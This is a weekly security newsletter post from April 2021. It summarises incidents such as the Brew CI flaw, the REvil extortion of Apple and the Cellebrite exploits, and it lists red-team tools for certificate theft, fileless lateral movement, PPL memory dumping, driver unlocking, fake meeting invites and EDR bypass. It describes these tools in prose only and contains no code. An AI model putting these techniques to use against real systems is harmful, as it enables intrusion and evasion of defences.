Last Week in Security (LWiS) - 2021-04-26

New APIs/syscalls for EDR bypass (@yarden_shafir), UAF browser exploit dev (@33y0re), PowerView replacement [EDD] (@FortyNorthSec), phishing banner defeat (@whynotsecurity), packer teardown (@fumik0_), NANDcromancy (@Atredis), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-04-19 to 2021-04-26.


  • Ill-advised research on Linux kernel lands computer scientists in hot water. Researchers from the University of Minnesota purposely introduced bugs into the Linux Kernel as part of a study on the potential to introduce bugs into open source projects. I'm not sure why this was necessary as plenty of real bugs are already committed to open source projects, including the Linux kernel, that result in exploitable bugs. Linux maintainers responded, appropriately, by banning any contributions from a University of Minnesota email account. The researchers have issued an open letter to the Linux community, but the damage has been done.
  • Security Incident Disclosure (Brew). Due to a way the Brew project's (package manager) GitHub actions were configured, it was possible to hide code from git_diff which would trick the auto-merge action into thinking only the version number was updated. This would allow an attacker to add malicious code to any Brew package without any human review. The issue has been fixed by disabling the automerge action as well as other steps including manual review.
  • Computer security world in mourning over death of Dan Kaminsky, aged 42. A star in the infosec community, Dan most famously worked to fix multiple DNS implementations vulnerable to cache poisoning, gave multiple Blackhat and DEF CON talks, and was generally just a good person. His loss at a young age (due to diabetic ketoacidosis) is a reminder to step away from the keyboard and enjoy life.
  • tmp.0ut Volume 1 is an homage to classic hacker zines packed full of great ELF knowledge.
  • Google Chrome DNS Security Bypass. A Chrome "feature" called Async-DNS will perform DNS lookups to Google's DNS servers regardless of how the host is configured. This post also includes ways to disable this on Windows and macOS (add the --disable-async-dns flag to the command line), as it could prevent DNS based defenses or logging. If you rely on an internal DNS server, blocking UDP 53 outbound on your firewall is a temporary solution until Google starts using DNS-over-HTTPS for this "feature." Switching to Firefox is a permanent solution.
  • REvil gang tries to extort Apple, threatens to sell stolen blueprints. Two interesting pieces of this story: The the stolen blueprints seem to confirm Apple's plans to add more ports and remove touch bar (all power users are happy about this), and the ransom is requested not it Bitcoin but in a much lesser known cryptocurrency called Monero which has true privacy.
  • Project Jengo Redux: Cloudflare’s Prior Art Search Bounty Returns. Patent trolls are a symptom of a broken patent system, but Cloudflare's response to them is fantastic. A $100,000 bounty to invalidate the patents used by the trolls is a solution that can have positive outcome for Cloudflare and generate some publicity about this flaw in the patent system.
  • clickstudios Passwordstate Incident Management Advisory #01. Supply chain attacks are here to stay, and what better software to hijack an update for than a password manager? Any critical systems should be protected by FIDO2 (U2F) hardware tokens. FIDO2 keys are a one-time investment that can save untold amounts of damage later on.
  • Exploiting vulnerabilities in Cellebrite UFED and Physical Analyzer from an app's perspective. Despite the questionable cryptocurrency moves, Signal proves it still has edge with this shade-ridden post about possibly, maybe, definitely including some Cellebrite parser 0days in a random selection of Signal user's devices. Interesting to see if this plays out in court with evidence rejected as it may have been tampered with or deleted by one of these exploits. Is it enough to cast doubt on any user's Signal data collected with Cellebrite?


Tools and Exploits

  • CertStealer is a .NET tool for stealing and importing certificates in the Windows certificate store without touching disk. Useful for red team operations where you need to poach a certificate for pivoting purposes and want to do so with an in-memory post-ex payload.
  • SharpNoPSExec is a fileless lateral movement tool that will query all services and randomly pick one with a start type disable or manual, the current status stopped and with LocalSystem privileges to reuse them. Once it select the service it will save its current state, replace the binary path with the payload of your choice and execute it. After waiting 5 seconds it will restore the service configuration.
  • Meet EDD - He Helps Enumerate Domain Data. EDD is a .NET tool to enumerate Windows domain designed to be similar to the now unmaintained PowerView.
  • PPLdump is a tool that implements a userland exploit that was initially discussed by James Forshaw (a.k.a. @tiraniddo) - in this blog post - for dumping the memory of any PPL as an administrator.
  • AsIo3Unlock is a proof-of-concept bypass of pseudo-security caller check implemented in AsIO3, "unlocking" this driver for usage with FULL R/W access.
  • fakemeeting is a tool for creating fake meeting invites. More details here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • STFUEDR. Everyone knows that userland hooks can be defeated, but some EDRs use drivers and kernel hooks. This project uses a driver signing bypass to defeat even those hooks!

This post is cross-posted on SIXGEN's blog.